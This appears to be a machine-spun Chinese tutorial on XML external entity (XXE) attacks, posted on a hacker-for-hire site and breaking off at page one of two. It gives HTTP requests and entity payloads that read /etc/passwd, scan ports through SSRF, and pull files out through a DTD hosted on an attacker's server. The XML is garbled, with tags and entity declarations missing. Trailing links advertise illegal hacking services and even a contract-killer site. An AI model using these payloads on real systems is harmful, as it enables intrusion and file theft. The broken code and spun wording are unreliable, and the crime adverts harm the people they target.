XXE缝隙使用技巧:从XML到长途代码履行

访客5年前关于黑客接单891


你的Web运用是否存在XXE缝隙?
假如你的运用是经过用户上传处理XML文件或POST恳求(例如将SAML用于单点登录服务乃至是RSS)的,那么你很有或许会遭到XXE的进犯。XXE是一种十分常见的缝隙类型,咱们简直每天都会碰到它。在上一年的几回web运用浸透中,咱们就成功的运用了好几回。
什么是XXE
简略来说,XXE便是XML外部实体注入。当答应引证外部实体时,经过结构歹意内容,就或许导致恣意文件读取、体系指令履行、内网端口勘探、进犯内网网站等损害。
例如,假如你当时运用的程序为PHP,则能够将libxml_disable_entity_loader设置为TRUE来禁用外部实体,然后起到防护的意图。
根本运用
一般进犯者会将payload注入XML文件中,一旦文件被履行,将会读取服务器上的本地文件,并对内网建议拜访扫描内部 *** 端口。换而言之,XXE是一种从本地抵达各种服务的办法。此外,在必定程度上这也或许协助进犯者绕过防火墙规矩过滤或身份验证检查。
以下是一个简略的XML代码POST恳求示例:
POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>XML is the best!description>
   core>
catalog>
之后,上述代码将交由服务器的XML处理器解析。代码被解说并回来:{“Request Successful”: “Added!”}
现在,当进犯者企图乱用XML代码解析时会发作什么?让咱们修改代码并包括咱们的歹意payload:
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
代码被解说并回来:
{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/ *** in:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...
Blind OOB XXE
如上例所示,服务器将/etc/passwd文件的内容作为呼应回来给咱们的XXE。但是在某些状况下,即使服务器或许存在XXE,也不会向进犯者的浏览器或署理回来任何呼应。遇到这种状况,咱们能够运用Blind XXE缝隙来构建一条外带数据(OOB)通道来读取数据。尽管咱们无法直接检查文件内容,但咱们依然能够运用易受进犯的服务器作为署理,在外部 *** 上履行扫描以及代码。
场景1 – 端口扫描
在之一个示例中,咱们经过URI将恳求指向了/etc/passwd文件,并终究成功的为咱们回来了文件中的内容。除此之外,咱们也能够运用http URI并强制服务器向咱们指定的端点和端口发送GET恳求,将XXE转换为SSRF(服务器端恳求假造)。
以下代码将测验与端口8080通讯,依据呼应时刻/长度,进犯者将能够判别该端口是否已被敞开。
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
场景2 – 经过DTD盗取文件
外部文档类型界说(DTD)文件可被用于触发OOB XXE。进犯者将.dtd文件保管在VPS上,使长途易受进犯的服务器获取该文件并履行其间的歹意指令。
以下恳求将被发送到运用程序以演示和测验该办法:
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
上述代码一旦由易受进犯的服务器处理,就会向咱们的长途服务器发送恳求,查找包括咱们的payload的DTD文件:
"file:///etc/passwd">

[1] [2]  黑客接单网

相关文章

黑客接单入侵服务器_中福娱乐提现取不了找黑客

loaded from chunks file, equals to the hashcode of its chunk在曩昔的几年里,当局现已开端在冲击暗网中的网络违法活动了,其间包含优待儿童、违禁...

黑客接单可靠吗_qq相册

6、111111 (新呈现)摘要近来,360要挟情报中心发布了《全球高档持续性要挟(APT)2018年陈述》(以下简称陈述),提醒了曩昔一年全球APT开展态势。 脚本块日志黑客接单可靠吗,qq相册 由...

最高信誉的黑客接单网_盗qq找黑客可以么

效果:Windows PowerShell 将记载指令、脚本块、函数和脚本的处理,不管是以交互方法调用仍是经过主动方法处理解码/解混杂代码· 一名23岁的澳大利亚女子因偷盗 10万个XRP被捕。 该女...

职业杀手雇佣网站,淘宝找黑客改销量,找黑客破解密码支靠谱吗

option domain-name "internal.example.org";http://php.net/manual/zh/functions.variable-functions.php0...

买数据,找黑客篡改网站,找黑客寻人

用户 - 网站(iis) - 安全狗 下载到电脑后,运转装置程序。 125.76.227.70/var/www/crossdomain对黑客来说,缝隙是宿敌。 挑选答案(多选)setTimeo...

Chrome歹意插件怎么侵略用户计算机

在咱们日常的日子中,浏览器扮演了一个更加重要的人物。跟着WEB使用的开展,咱们开端把最私密的数据放到如Facebook、Amazon或许Gmail等在线服务平台上。 这样的大趋势使得咱们的在线服务更...